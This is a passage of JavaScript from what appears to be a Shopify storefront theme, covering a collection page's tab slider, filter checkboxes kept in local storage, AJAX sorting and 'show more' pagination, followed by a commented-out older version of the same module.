        var slot = candidate.closest('.collection-menu-tabs-slot');
        if (slot) {
          var slotStyle = window.getComputedStyle(slot);
          if (slotStyle.display === 'none' || slotStyle.visibility === 'hidden') {
            continue;
          }
        }
        slider = candidate;
        break;
      }
      if (!slider && sliders.length) {
        slider = sliders[0];
      }
      if (!slider) {
        return;
      }

      var count = parseInt(slider.dataset.count, 10) || 0;
      if (count < 2) {
        return;
      }
      var initialIndex = parseInt(slider.dataset.initialIndex, 10) || 0;
      if (initialIndex >= count) {
        initialIndex = 0;
      }
      var isMobile =
        typeof window.matchMedia === 'function' && window.matchMedia('(max-width: 767px)').matches;

      function initFlickity() {
        if (slider.classList.contains('flickity-enabled') || self.collectionMenuTabsFlickity) {
          return;
        }
        slider.classList.remove(
          'collection-menu-tabs__slider--layout-center',
          'collection-menu-tabs__slider--layout-spread',
          'collection-menu-tabs__slider--layout-spread-fit'
        );
        /*
         * Same core Flickity options as theme.CollectionSwitcher (`sliderArgs`). That carousel
         * uses groupCells (e.g. 5 products per slide) so native prev/next disable matches the
         * scroll end. Tabs are one cell per link (no groupCells); with contain:true, index-based
         * arrows can disagree from scroll — syncArrows fixes that.
         */
        self.collectionMenuTabsFlickity = new theme.Slideshow(slider, {
          adaptiveHeight: false,
          avoidReflow: true,
          autoPlay: false,
          cellAlign: 'left',
          contain: true,
          fade: false,
          draggable: true,
          dragThreshold: isMobile ? 16 : 10,
          freeScroll: true,
          friction: 0.42,
          initialIndex: initialIndex,
          pageDots: false,
          percentPosition: false,
          prevNextButtons: true,
          selectedAttraction: 0.055,
          setGallerySize: true,
          rightToLeft: theme.config.rtl,
          wrapAround: false
        });
        var flk = self.collectionMenuTabsFlickity.slideshow;
        if (!flk) {
          return;
        }
        var prevBtn = null;
        var nextBtn = null;
        function syncMenuTabsArrows() {
          if (!prevBtn) prevBtn = slider.querySelector('.flickity-previous');
          if (!nextBtn) nextBtn = slider.querySelector('.flickity-next');
          if (!prevBtn || !nextBtn || !flk.size) {
            return;
          }
          var innerW = flk.size.innerWidth || 0;
          var sw = typeof flk.slideableWidth === 'number' ? flk.slideableWidth : 0;
          var maxScroll = Math.max(0, sw - innerW);
          if (maxScroll <= 1) {
            prevBtn.disabled = true;
            nextBtn.disabled = true;
            return;
          }
          if (theme.config.rtl) {
            return;
          }
          var x = flk.x;
          prevBtn.disabled = x >= -1;
          nextBtn.disabled = x <= -maxScroll + 1;
        }
        /*
         * NOTE: do NOT bind syncMenuTabsArrows to Flickity's 'scroll' event — that fires
         * on every animation tick (~60fps) and the DOM work made the slide animation
         * visibly jerky. select/settle/dragEnd cover every real state transition.
         */
        flk.on('select', syncMenuTabsArrows);
        flk.on('settle', syncMenuTabsArrows);
        flk.on('dragEnd', syncMenuTabsArrows);
        syncMenuTabsArrows();

        /*
         * Flickity reads cell widths from getComputedStyle (rounded), but rendered text can be
         * a fraction of a pixel wider, so contain:true can stop ~1px short of the true edge —
         * clipping the last character (e.g. the 's' on 'Lifting Accessories'). After settle,
         * measure the actual overflow on the rightmost cell and nudge flk.x by that amount.
         */
        function correctLastCellOverflow() {
          if (theme.config.rtl || !flk || !flk.viewport || !flk.cells || !flk.cells.length) {
            return;
          }
          var lastIdx = flk.cells.length - 1;
          if (flk.selectedIndex !== lastIdx) {
            return;
          }
          var lastCell = flk.cells[lastIdx];
          var lastEl = lastCell && lastCell.element;
          if (!lastEl) {
            return;
          }
          var cellRect = lastEl.getBoundingClientRect();
          var vpRect = flk.viewport.getBoundingClientRect();
          var overflow = cellRect.right - vpRect.right;
          if (overflow > 0.5) {
            flk.x -= Math.ceil(overflow) + 1;
            flk.positionSlider();
            syncMenuTabsArrows();
          }
        }
        flk.on('settle', correctLastCellOverflow);
        flk.on('dragEnd', correctLastCellOverflow);

        /*
         * Toggle `is-at-start` / `is-at-end` BEFORE the slide animation begins.
         * That changes the slider's padding (CSS), which shifts the Flickity viewport
         * inside the slider element. We compensate flk.x by the same delta so cells —
         * which are anchored to viewport_left for cellAlign:'left' — stay visually still.
         * Flickity then tweens to the new clamped target in one smooth motion.
         *
         * Pre-flight runs for button clicks (we override next/previous). For drag, the
         * post-settle sync (a fallback) may produce a tiny jump because flk.x is already
         * pinned to the boundary by contain:true — we can't shift further to compensate.
         *
         * Arrow preflight passes suppressViewportResizeObserver so padding + flk.resize()
         * does not trigger the viewport ResizeObserver into a second resize() mid-tween.
         */
        var suppressMenuTabsViewportResizeObserver = false;
        function applyBoundaryClasses(destIdx, opts) {
          opts = opts || {};
          if (!flk || !flk.cells || !flk.cells.length || theme.config.rtl) {
            return false;
          }
          var lastIdx = flk.cells.length - 1;
          var shouldStart = destIdx <= 0;
          var shouldEnd = destIdx >= lastIdx;
          var hasStart = slider.classList.contains('is-at-start');
          var hasEnd = slider.classList.contains('is-at-end');
          if (shouldStart === hasStart && shouldEnd === hasEnd) {
            return false;
          }
          if (opts.suppressViewportResizeObserver) {
            suppressMenuTabsViewportResizeObserver = true;
          }
          var prevLeft = parseFloat(getComputedStyle(slider).paddingLeft) || 0;
          slider.classList.toggle('is-at-start', shouldStart);
          slider.classList.toggle('is-at-end', shouldEnd);
          var newLeft = parseFloat(getComputedStyle(slider).paddingLeft) || 0;
          var deltaLeft = newLeft - prevLeft;
          try { flk.resize(); } catch (e) {}
          if (deltaLeft !== 0) {
            var sw2 = flk.slideableWidth || 0;
            var iw2 = (flk.size && flk.size.innerWidth) || 0;
            var maxScroll2 = Math.max(0, sw2 - iw2);
            var compX = flk.x - deltaLeft;
            flk.x = Math.max(-maxScroll2, Math.min(0, compX));
            flk.positionSlider();
          }
          return true;
        }

        var origPrev = flk.previous.bind(flk);
        var origNext = flk.next.bind(flk);
        flk.previous = function() {
          if (flk.cells && flk.cells.length) {
            applyBoundaryClasses(Math.max(0, flk.selectedIndex - 1), {
              suppressViewportResizeObserver: true
            });
          }
          origPrev();
        };
        flk.next = function() {
          if (flk.cells && flk.cells.length) {
            applyBoundaryClasses(Math.min(flk.cells.length - 1, flk.selectedIndex + 1), {
              suppressViewportResizeObserver: true
            });
          }
          origNext();
        };

        function syncBoundaryFromPosition() {
          if (!flk || !flk.size || theme.config.rtl) {
            return;
          }
          var innerW = flk.size.innerWidth || 0;
          var sw = flk.slideableWidth || 0;
          var maxScroll = Math.max(0, sw - innerW);
          var atStart = flk.x >= -1;
          var atEnd = maxScroll > 1 && flk.x <= -maxScroll + 1;
          var hasStart = slider.classList.contains('is-at-start');
          var hasEnd = slider.classList.contains('is-at-end');
          if (atStart === hasStart && atEnd === hasEnd) return;
          applyBoundaryClasses(atStart ? 0 : (atEnd ? flk.cells.length - 1 : flk.selectedIndex));
        }
        flk.on('settle', syncBoundaryFromPosition);
        syncBoundaryFromPosition();

        /* After padding/sync handlers on this frame, allow viewport ResizeObserver again. */
        flk.on('settle', function() {
          suppressMenuTabsViewportResizeObserver = false;
        });

        var viewport = flk.viewport || slider.querySelector('.flickity-viewport');
        if (viewport && typeof ResizeObserver !== 'undefined') {
          var resizeMenuTabsRaf = null;
          self.collectionMenuTabsResizeObserver = new ResizeObserver(function() {
            if (suppressMenuTabsViewportResizeObserver) {
              return;
            }
            if (resizeMenuTabsRaf) {
              cancelAnimationFrame(resizeMenuTabsRaf);
            }
            resizeMenuTabsRaf = requestAnimationFrame(function() {
              resizeMenuTabsRaf = null;
              if (suppressMenuTabsViewportResizeObserver) {
                return;
              }
              try { flk.resize(); } catch (e) {}
              syncMenuTabsArrows();
            });
          });
          self.collectionMenuTabsResizeObserver.observe(viewport);
        }
      }

      function checkLayout() {
        if (slider.classList.contains('flickity-enabled')) {
          return;
        }
        if (slider.scrollWidth > slider.clientWidth + 4) {
          initFlickity();
          return;
        }
        /* Fits: keep --layout-center from Liquid (no spread-fit upgrade). */
      }

      checkLayout();
      if (document.fonts && document.fonts.ready) {
        document.fonts.ready.then(checkLayout);
      }

      self.collectionMenuTabsStaticResizeHandler = theme.utils.debounce(120, function() {
        self.initCollectionMenuTabs();
      });
      window.addEventListener('resize', self.collectionMenuTabsStaticResizeHandler);
    },

    scheduleSaveCheckedCheckboxes: function(scopeRoot) {
      var self = this;
      function run() {
        self.saveCheckedCheckboxes(scopeRoot);
      }
      if (typeof window.requestIdleCallback === 'function') {
        window.requestIdleCallback(run, { timeout: 2000 });
      } else {
        setTimeout(run, 0);
      }
    },

    saveCheckedCheckboxes: function (scopeRoot) {
      var root = scopeRoot && scopeRoot.querySelector ? scopeRoot : document;
      var checkboxes = root.querySelectorAll('.tag-list input[type="checkbox"]');
      var checkedValues = [];
      checkboxes.forEach(function(checkbox) {
        if (checkbox.checked) {
          checkedValues.push(checkbox.value);
        }
      });
      localStorage.setItem('checkedCheckboxes', JSON.stringify(checkedValues));
      this.updateCustomClosetButtons();
    },

    loadCheckedCheckboxes: function(){
      var checkboxes = document.querySelectorAll('.tag-list input[type="checkbox"]');
      var checkedValues = JSON.parse(localStorage.getItem('checkedCheckboxes') || '[]');
      checkboxes.forEach(function(checkbox) {
        if (checkedValues.includes(checkbox.value)) {
          checkbox.checked = true;
        }
      });
      this.updateCustomClosetButtons();
    },

    updateCustomClosetButtons: function(){    
      var customCloset = document.querySelector('.custom-closet');
      if (!customCloset) return;
      customCloset.innerHTML = '';
  
      var checkedValues = JSON.parse(localStorage.getItem('checkedCheckboxes') || '[]');
      checkedValues.forEach(function(value) {
        var button = document.createElement('button');
        button.textContent = value;
        button.addEventListener('click', function() {
          this.classList.add('hide','hidden')

          var links = document.querySelectorAll(`.tag-list--active-tags a`);
          for(let link of links){
            if (link.innerText == value) {
              link.click();
            }
          }
          
          var checkbox = document.querySelector(`.tag-list input[value="${value}"]`);
          if (checkbox) {
            checkbox.click();
            checkbox.checked = false;
          }
        });
        customCloset.appendChild(button);
      });

      const checkedCheckboxes = JSON.parse(localStorage.getItem('checkedCheckboxes') || '[]');
      
      if (checkedCheckboxes.length > 0 && !customCloset.querySelector('.clear-all-btn')) {
        const clearAllButton = document.createElement('a');
        clearAllButton.href = 'javascript:void(0)';
        clearAllButton.textContent = 'Clear All';
        clearAllButton.className = 'clear-all-btn';

        clearAllButton.addEventListener('click', () => {
          const currentUrl = window.location.href;
          const filterIndex = currentUrl.indexOf('?filter');
          const filterIndex2 = currentUrl.indexOf('filter');
          const sortIndex = currentUrl.indexOf('?sort_by');

          if (filterIndex !== -1) {
            const newUrl = currentUrl.substring(0, filterIndex);
            localStorage.setItem('checkedCheckboxes', []);
            window.location.href = newUrl;
          } else if (sortIndex !== -1) {
            const newUrl = currentUrl.substring(0, sortIndex);
            localStorage.setItem('checkedCheckboxes', []);
            window.location.href = newUrl;
          } else if (filterIndex2 !== -1) {
            const newUrl = currentUrl.substring(0, filterIndex2);
            localStorage.setItem('checkedCheckboxes', []);
            window.location.href = newUrl;
          } else {
            console.log('No filter query found in the URL');
          }
        });

        customCloset.appendChild(clearAllButton);
      }
    },

    handleCheckboxChange: function (evt) {
      var form =
        evt.target && evt.target.closest && evt.target.closest('form.filter-form');
      this.scheduleSaveCheckedCheckboxes(form || undefined);
    },

    checkAllBoxes:function(){
      var checkboxes = document.querySelectorAll('.tag-list input[type="checkbox"]');
      var checkedValues = JSON.parse(localStorage.getItem('checkedCheckboxes') || '[]');
      var zeroChecked = false ;
      checkboxes.forEach(function(checkbox) {
        if (checkbox.checked === true) {
          zeroChecked = true
        }
      });
      if(zeroChecked == false){
        checkboxes.forEach(function(checkbox) {
          checkbox.checked = false;
        });
        localStorage.setItem('checkedCheckboxes', []);
      }
    },

    onClickCloseDrawer: function(){
      if (window.innerWidth < 768) {
        this.savePersistedOpenFilters();
      }
      document.querySelector("#FilterDrawer").classList.remove("open");
    },

    onTagClick: function(evt) {
      const tag = evt.currentTarget;
      if (tag.classList.contains('no-ajax')) return;
      evt.preventDefault();
      if (isAnimating) return;

      isAnimating = true;
      const parent = tag.parentNode;
      const newUrl = new URL(tag.href);

      this.renderActiveTag(parent, tag);
      this.startLoading();
      this.renderCollectionPage(newUrl.searchParams);
    },

    /**
     * Checkbox/radio filters: use change (not input) so we run once per apply.
     * Defer DOM + fetch kickoff to after paint for lower INP.
     */
    onFilterFormChange: function(evt) {
      var tag = evt.target;
      if (!tag || typeof tag.closest !== 'function') return;
      if (tag.classList.contains('no-ajax')) return;

      var tn = tag.tagName;
      var inputType = tag.type && String(tag.type).toLowerCase();
      if (tn !== 'INPUT' || (inputType !== 'checkbox' && inputType !== 'radio')) {
        return;
      }

      evt.preventDefault();
      if (isAnimating) return;

      var parent = tag.closest('li');
      var formEl = tag.closest('form');
      if (!formEl || !parent) return;

      isAnimating = true;
      var formData = new FormData(formEl);
      var self = this;

      this.scheduleSaveCheckedCheckboxes(formEl);

      requestAnimationFrame(function() {
        requestAnimationFrame(function() {
          self.renderActiveTag(parent, tag);
          self.startLoading();
          self.renderFromFormData(formData);
        });
      });
    },

    onPriceRangeFormChange: function(formData) {
      if (isAnimating) return;
      isAnimating = true;
      var self = this;
      requestAnimationFrame(function() {
        requestAnimationFrame(function() {
          self.startLoading();
          self.renderFromFormData(formData);
        });
      });
    },

    renderActiveTag: function(parent, el) {
      const textEl = parent.querySelector('.tag-text');

      if (parent.classList.contains(classes.activeTag)) {
        parent.classList.remove(classes.activeTag);
      } else {
        parent.classList.add(classes.activeTag);

        if (el.closest('li').classList.contains(classes.removeTagParent)) {
          parent.remove();
        } else {
          document.querySelectorAll(selectors.activeTagList).forEach(list => {
            const newTag = document.createElement('li');
            const newTagLink = document.createElement('a');
            newTag.classList.add('tag', 'tag--remove');
            newTagLink.classList.add('btn', 'btn--small');
            newTagLink.innerText = textEl.innerText;
            newTag.appendChild(newTagLink);
            list.appendChild(newTag);
          });
        }
      }
    },

    renderFromFormData: function(formData) {
      const searchParams = new URLSearchParams(formData);
      this.renderCollectionPage(searchParams);
    },

    renderCollectionPage: function(searchParams, updateURLHash = true) {
      const currentPath = window.location.pathname;
      const previousPath = localStorage.getItem('previousCollectionPath');

      if (previousPath && previousPath !== currentPath) {
        localStorage.removeItem('checkedCheckboxes');
      }
      localStorage.setItem('previousCollectionPath', currentPath);

      /* Mobile: run the same Drawers close animation while the section fetch runs; reinit waits on drawerClose so destroy() does not snap the panel shut mid-transition. */
      if (
        window.innerWidth < 768 &&
        theme.FilterDrawer &&
        theme.FilterDrawer.isOpen
      ) {
        theme.FilterDrawer.close();
      }

      this.ajaxRenderer
        .renderPage(window.location.pathname, searchParams, updateURLHash)
        .then(() => {
          document.dispatchEvent(new CustomEvent('collection:reloaded'));
          isAnimating = false;
        });
    },

    onShowMoreClick: function(evt) {
      var btn = evt.target.closest('.js-show-more-collection');
      if (!btn) return;
      evt.preventDefault();
      var wrapper = btn.closest('.collection-show-more');
      if (!wrapper) return;
      var currentPage = parseInt(wrapper.getAttribute('data-current-page'), 10) || 1;
      var totalPages = parseInt(wrapper.getAttribute('data-total-pages'), 10) || 1;
      if (currentPage >= totalPages) return;
      var sectionId = wrapper.getAttribute('data-section-id');
      if (!sectionId) return;
      var grid = this.container.querySelector('#CollectionAjaxContent .grid.featured-collection-custom');
      if (!grid) return;
      var loadingEl = wrapper.querySelector('.collection-show-more__loading');
      btn.style.display = 'none';
      if (loadingEl) loadingEl.style.display = '';
      var nextPage = currentPage + 1;
      var params = new URLSearchParams(window.location.search);
      params.set('page', String(nextPage));
      var url = window.location.pathname + '?section_id=' + sectionId + '&' + params.toString();
      fetch(url)
        .then(function(res) { return res.text(); })
        .then(function(html) {
          var parser = new DOMParser();
          var doc = parser.parseFromString('<div id="show-more-root">' + html + '</div>', 'text/html');
          var root = doc.getElementById('show-more-root');
          if (!root) return;
          var newGrid = root.querySelector('#CollectionAjaxContent .grid.featured-collection-custom');
          if (newGrid) {
            var items = Array.prototype.slice.call(newGrid.children);
            var appended = [];
            items.forEach(function(item) {
              var clone = item.cloneNode(true);
              grid.appendChild(clone);
              appended.push(clone);
            });
            appended.forEach(function(node) {
              if (typeof theme.forceLoadImagesForShowMore === 'function') {
                theme.forceLoadImagesForShowMore(node);
              }
            });
          }
          wrapper.setAttribute('data-current-page', String(nextPage));
          if (nextPage >= totalPages) {
            wrapper.style.display = 'none';
          } else {
            btn.style.display = '';
          }
          if (loadingEl) loadingEl.style.display = 'none';
          if (typeof theme.reinitProductGridItem === 'function') {
            theme.reinitProductGridItem(grid);
          }
        })
        .catch(function() {
          btn.style.display = '';
          if (loadingEl) loadingEl.style.display = 'none';
        });
    },

    initPriceRange: function() {
      const priceRangeEls = document.querySelectorAll(selectors.priceRange);
      priceRangeEls.forEach((el) => {
        var inputMin = el.querySelector(selectors.priceRangeInputMin);
        var inputMax = el.querySelector(selectors.priceRangeInputMax);
        if (inputMin && inputMax && inputMin.value !== '' && inputMax.value !== '') {
          el.dataset.minValue = inputMin.value;
          el.dataset.maxValue = inputMax.value;
        }
        new theme.PriceRange(el, {
          onChange: this.onPriceRangeFormChange.bind(this),
        });
      });
    },

    getSortValue: function() {
      return this.sortSelect.value || this.defaultSort;
    },

    getDefaultSortValue: function() {
      return this.sortSelect.getAttribute('data-default-sortby');
    },

    onSortChange: function() {
      var searchParams = new URLSearchParams(window.location.search);
      searchParams.set('sort_by', this.getSortValue());
      searchParams.delete('page');
      if (isAnimating) return;
      isAnimating = true;
      this.startLoading();
      this.renderCollectionPage(searchParams);
    },

    fetchOpenCollasibleFilters: function() {
      var container = document.querySelector(selectors.sidebar) || document.querySelector('#FilterDrawer');
      if (!container) return [];
      var fromDetails = Array.from(container.querySelectorAll(selectors.filterDetails + '[open]'))
        .map(function(d) {
          return d.getAttribute('data-collapsible-id');
        })
        .filter(Boolean);
      if (fromDetails.length) {
        return fromDetails;
      }
      return Array.from(
        container.querySelectorAll(
          selectors.trigger + '.' + classes.isOpen,
        ),
      ).map(trigger => trigger.dataset.collapsibleId).filter(Boolean);
    },

    getFilterStorageKey: function() {
      var path = window.location.pathname;
      if (path === '/search' || path.indexOf('/search') === 0) {
        return 'searchFilterOpenCategories';
      }
      return 'collectionFilterOpenCategories_' + path;
    },

    savePersistedOpenFilters: function() {
      var ids = this.fetchOpenCollasibleFilters();
      try {
        sessionStorage.setItem(this.getFilterStorageKey(), JSON.stringify(ids));
      } catch (e) {}
    },

    restorePersistedOpenFilters: function() {
      var drawer = document.getElementById('FilterDrawer');
      if (!drawer) return;
      try {
        var ids = JSON.parse(sessionStorage.getItem(this.getFilterStorageKey()) || '[]');
        if (!ids.length) return;
        ids.forEach(function(id) {
          drawer.querySelectorAll('[data-collapsible-id="' + id + '"]').forEach(this.openCollapsible.bind(this));
        }.bind(this));
      } catch (e) {}
    },

    collapseAllFilterDrawerSections: function() {
      var drawer = document.getElementById('FilterDrawer');
      if (!drawer) return;
      drawer.querySelectorAll(selectors.filterDetails + '[open]').forEach(function(el) {
        el.removeAttribute('open');
      });
      var openTriggers = drawer.querySelectorAll(selectors.trigger + '.' + classes.isOpen);
      openTriggers.forEach(function(trigger) {
        trigger.classList.remove(classes.isOpen);
        trigger.setAttribute('aria-expanded', 'false');
        var moduleId = trigger.getAttribute('aria-controls') || trigger.dataset.controls;
        if (moduleId) {
          var container = document.getElementById(moduleId) || trigger.parentNode.querySelector('[data-id="' + moduleId + '"]');
          if (container) {
            container.style.height = '0px';
            container.classList.remove(classes.isOpen);
          }
        }
      });
    },

    onReplaceAjaxContent: function(newDom, section) {
      const openCollapsibleIds = this.fetchOpenCollasibleFilters();

      openCollapsibleIds.forEach(selector => {
        newDom
          .querySelectorAll('[data-collapsible-id="' + selector + '"]')
          .forEach(this.openCollapsible);
      });

      if (typeof section.nodeId === 'string') {
        var newContentEl = newDom.getElementById(section.nodeId);
        if (!newContentEl) return;
        document.getElementById(section.nodeId).innerHTML = newContentEl.innerHTML;
      } else {
        section.nodeId.forEach(id => {
          var currentEl = document.getElementById(id);
          var newEl = newDom.getElementById(id);
          if (currentEl && newEl) {
            currentEl.innerHTML = newEl.innerHTML;
          }
        });
      }

      var newDrawer = newDom.getElementById('FilterDrawer');
      var currentDrawer = document.getElementById('FilterDrawer');
      if (newDrawer && currentDrawer) {
        var newScrollable = newDrawer.querySelector('.drawer__scrollable');
        var currentScrollable = currentDrawer.querySelector('.drawer__scrollable');
        if (newScrollable && currentScrollable) {
          currentScrollable.innerHTML = newScrollable.innerHTML;
        } else {
          var newActiveTags = newDrawer.querySelector('.tag-list--active-tags');
          var currentActiveTags = currentDrawer.querySelector('.tag-list--active-tags');
          if (newActiveTags && currentActiveTags) {
            currentActiveTags.innerHTML = newActiveTags.innerHTML;
          }
        }
      }

      this.reInit(newDom);
    },

    openCollapsible: function(el) {
      if (el.tagName === 'DETAILS') {
        el.open = true;
        return;
      }
      if (el.classList.contains(classes.filterSidebar)) {
        el.style.height = 'auto';
      }
      el.classList.add(classes.isOpen);
    },

    reInit: function(doc) {
      for (var i = 0; i < theme.sections.instances.length; i++) {
        var instance = theme.sections.instances[i];
        if (instance['type'] === 'collection-template') {
          instance.forceReload();
        }
      }

      this.initPriceRange();
      theme.reinitProductGridItem();
    },

    forceReload: function() {
      this.onUnload();
      this.init();
    },

    onUnload: function() {
      if (this._filterDrawerDrawerCloseBound) {
        document.removeEventListener('drawerClose', this._filterDrawerDrawerCloseBound);
        this._filterDrawerDrawerCloseBound = null;
      }
      if (this._filterDrawerDrawerOpenBound) {
        document.removeEventListener('drawerOpen.FilterDrawer', this._filterDrawerDrawerOpenBound);
        this._filterDrawerDrawerOpenBound = null;
      }
    },

    checkIfNeedReload: function() {
      if (!Shopify.designMode) return;

      if (theme.settings.overlayHeader) {
        var header = document.querySelector('.header-wrapper');
        if (!header.classList.contains('header-wrapper--overlay')) {
          location.reload();
        }
      }
    },

    bindBackButton: function() {
      window.off('popstate' + this.namespace);
      window.on('popstate' + this.namespace, function(state) {
        if (state) {
          const newUrl = new URL(window.location.href);
          this.renderCollectionPage(newUrl.searchParams, false);
        }
      }.bind(this));
    },

    startLoading: function() {
      this.container.querySelectorAll('.grid-product').forEach(item => {
        item.classList.add('unload');
      });
    },
  });

  return Collection;
})();

  
  // theme.Collection = (function() {
  //   var isAnimating = false;
  //   var hasLoadedBefore = false;
  
  //   var selectors = {
  //     sortSelect: '#SortBy',
  //     hero: '.collection-hero',
  //     title: '.collection-title',
  //     sidebar: '#CollectionSidebar',
  
  //     // filter selectors
  //     activeTagList: '.tag-list--active-tags',
  //     tags: '.tag-list input',
  //     activeTags: '.tag-list a',
  //     tagsForm: '.filter-form',
  //     filters: '.collection-filter',
  //     filterSidebar: '.collapsible-content--sidebar',
  //     trigger: '.collapsible-trigger',
  //     priceRange: '.price-range',
  //   };
  
  //   var classes = {
  //     activeTag: 'tag--active',
  //     removeTagParent: 'tag--remove',
  //     filterSidebar: 'collapsible-content--sidebar',
  //     isOpen: 'is-open',
  //   };
  
  //   function Collection(container) {
  //     this.container = container;
  //     this.sectionId = container.getAttribute('data-section-id');
  //     this.namespace = '.collection-' + this.sectionId;
  
  //     var heroImageContainer = container.querySelector('.collection-hero');
  
  //     if (heroImageContainer) {
  //       if (hasLoadedBefore) {
  //         this.checkIfNeedReload();
  //       }
  
  //       heroImageContainer.classList.remove('loading', 'loading--delayed');
  //       heroImageContainer.classList.add('loaded');
  
  //     } else if (theme.settings.overlayHeader) {
  //       theme.headerNav.disableOverlayHeader();
  //     }
  
  //     this.sidebar = new theme.CollectionSidebar(container);
  
  //     // Ajax loader for filters
  //     this.ajaxRenderer = new theme.AjaxRenderer({
  //       sections: [
  //         {
  //           sectionId: this.sectionId,
  //           nodeId: ['CollectionAjaxContent', 'FilterDrawerTrigger', 'FilterDrawer'],
  //         },
  //       ],
  //       onReplace: this.onReplaceAjaxContent.bind(this),
  //     });
  
  //     this.init();
  //   }
  
  //   Collection.prototype = Object.assign({}, Collection.prototype, {
  //     init: function() {
  //       this.bindBackButton();
  //       this.sidebar.init();
  //       this.sortSelect = this.container.querySelector(selectors.sortSelect);
  
  //       if (this.sortSelect) {
  //         this.defaultSort = this.getDefaultSortValue();
  //         this.sortSelect.addEventListener('change', this.onSortChange.bind(this));
  //       }
  
  //       this.initPriceRange();
  
  //       document.querySelectorAll(selectors.activeTags).forEach(tag => {
  //         tag.addEventListener('click', this.onTagClick.bind(this));
  //         tag.addEventListener('click', this.handleCheckboxChange.bind(this));
  //       });
  
  //       document.querySelectorAll(selectors.tagsForm).forEach(form => {
  //         form.addEventListener('input', this.onFormSubmit.bind(this));
  //         form.addEventListener('input', this.handleCheckboxChange.bind(this));
  //       });

  //       document.querySelector("#FilterDrawer .drawer__close-button.js-drawer-close").addEventListener("click", this.onClickCloseDrawer.bind(this));

  //       this.loadCheckedCheckboxes();
  
  //       hasLoadedBefore = true;
  //     },

  //     saveCheckedCheckboxes: function () {
  //      var checkboxes = document.querySelectorAll('.tag-list input[type="checkbox"]');
  //       var checkedValues = [];
  //       checkboxes.forEach(function(checkbox) {
  //         if (checkbox.checked) {
  //           checkedValues.push(checkbox.value);
  //         }
  //       });
  //       localStorage.setItem('checkedCheckboxes', JSON.stringify(checkedValues));
  //       this.updateCustomClosetButtons();
  //     },

  //     loadCheckedCheckboxes: function(){
  //        var checkboxes = document.querySelectorAll('.tag-list input[type="checkbox"]');
  //       var checkedValues = JSON.parse(localStorage.getItem('checkedCheckboxes') || '[]');
  //       checkboxes.forEach(function(checkbox) {
  //         if (checkedValues.includes(checkbox.value)) {
  //           checkbox.checked = true;
  //         }
  //       });
  //       this.updateCustomClosetButtons();
  //     },

  //     updateCustomClosetButtons: function(){    
        
  //        var customCloset = document.querySelector('.custom-closet');
  //         customCloset.innerHTML = '';
      
  //         var checkedValues = JSON.parse(localStorage.getItem('checkedCheckboxes') || '[]');
  //         checkedValues.forEach(function(value) {
  //           var button = document.createElement('button');
  //           button.textContent = value;
  //           button.addEventListener('click', function() {
  //             this.classList.add('hide','hidden')

  //           var links = document.querySelectorAll(`.tag-list--active-tags a`);
  //             for(let link of links){
  //               if (link.innerText == value) {
  //                 // console.log(link)
  //                 link.click();
  //               }
  //             }
              
  //             var checkbox = document.querySelector(`.tag-list input[value="${value}"]`);
  //             if (checkbox) {
  //               // console.log(checkbox)
  //               checkbox.click();
  //               checkbox.checked = false;
  //               // console.log(checkbox)
  //             }
  //           });
  //           customCloset.appendChild(button);
  //         });

  //       const checkedCheckboxes = JSON.parse(localStorage.getItem('checkedCheckboxes') || '[]');
        
  //          if (checkedCheckboxes.length > 0 && !customCloset.querySelector('.clear-all-btn')) {
  //           // Create the "Clear All" button
  //           const clearAllButton = document.createElement('a');
  //           clearAllButton.href = 'javascript:void(0)';
  //           clearAllButton.textContent = 'Clear All';
  //           clearAllButton.className = 'clear-all-btn';
      
  //           // Add an event listener to clear localStorage and remove the button
  //           clearAllButton.addEventListener('click', () => {
  //               const currentUrl = window.location.href;
  //               // Check if the URL contains '?filter'
  //               const filterIndex = currentUrl.indexOf('?filter');
  //               const filterIndex2 = currentUrl.indexOf('filter');
  //               const sortIndex = currentUrl.indexOf('?sort_by');
                
  //               if (filterIndex !== -1) {
  //               // Remove everything from '?filter' onwards
  //               const newUrl = currentUrl.substring(0, filterIndex);
  //               localStorage.setItem('checkedCheckboxes', []);
  //               // Refresh the page with the new URL
  //               window.location.href = newUrl;
  //               } else {
  //               // If no '?filter' in the URL, do nothing or optionally reload the page
  //               console.log('No filter query found in the URL');
  //               }
  //               if (sortIndex !== -1) {
  //               // Remove everything from '?filter' onwards
  //               const newUrl = currentUrl.substring(0, sortIndex);
  //               localStorage.setItem('checkedCheckboxes', []);
  //               // Refresh the page with the new URL
  //               window.location.href = newUrl;
  //               } else {
  //               // If no '?filter' in the URL, do nothing or optionally reload the page
  //               console.log('No filter query found in the URL');
  //               }
  //               if (filterIndex2 !== -1) {
  //               // Remove everything from '?filter' onwards
  //               const newUrl = currentUrl.substring(0, filterIndex2);
  //               localStorage.setItem('checkedCheckboxes', []);
  //               // Refresh the page with the new URL
  //               window.location.href = newUrl;
  //               } else {
  //               // If no '?filter' in the URL, do nothing or optionally reload the page
  //               console.log('No filter query found in the URL');
  //               }
  //           });

  //           // tgk comment
  //           // Append the button to the custom-closet
  //           customCloset.appendChild(clearAllButton);
  //         }
  //     },

  //    handleCheckboxChange: function (evt) {
  //       // console.log(evt)
  //       // this.checkAllBoxes();
  //       this.saveCheckedCheckboxes();
  //       // this.onTagClick(evt)
  //     },

  //     checkAllBoxes:function(){
  //         // console.log('running......')
  //        var checkboxes = document.querySelectorAll('.tag-list input[type="checkbox"]');
  //        var checkedValues = JSON.parse(localStorage.getItem('checkedCheckboxes') || '[]');
  //        var zeroChecked = false ;
  //         checkboxes.forEach(function(checkbox) {
  //           if (checkbox.checked === true) {
  //           console.log(checkbox)
  //            zeroChecked = true
  //           }
  //         });
  //         if(zeroChecked == false){
  //           checkboxes.forEach(function(checkbox) {
  //             checkbox.checked = false;
  //           });
  //           localStorage.setItem('checkedCheckboxes', []);
  //         }
  //     },

  //     onClickCloseDrawer: function(){
  //       // console.log('hi');
  //        document.querySelector("#FilterDrawer").classList.remove("open");
  //     },
  
  //     onTagClick: function(evt) {
  //       const tag = evt.currentTarget;
  
  //       if (tag.classList.contains('no-ajax')) {
  //         return;
  //       }
  
  //       evt.preventDefault();
  
  //       if (isAnimating) {
  //         return;
  //       }
  
  //       isAnimating = true;
  
  //       const parent = tag.parentNode;
  //       const newUrl = new URL(tag.href);
  
  //       this.renderActiveTag(parent, tag);
  //       this.startLoading();
  //       this.renderCollectionPage(newUrl.searchParams);
  //     },
  
  //     onFormSubmit: function(evt) {
  //       const tag = evt.target;
  //       // console.log(this)
  //       // Do not ajax-load collection links
  //       if (tag.classList.contains('no-ajax')) {
  //         return;
  //       }
  
  //       evt.preventDefault();
  
  //       if (isAnimating) {
  //         return;
  //       }
  
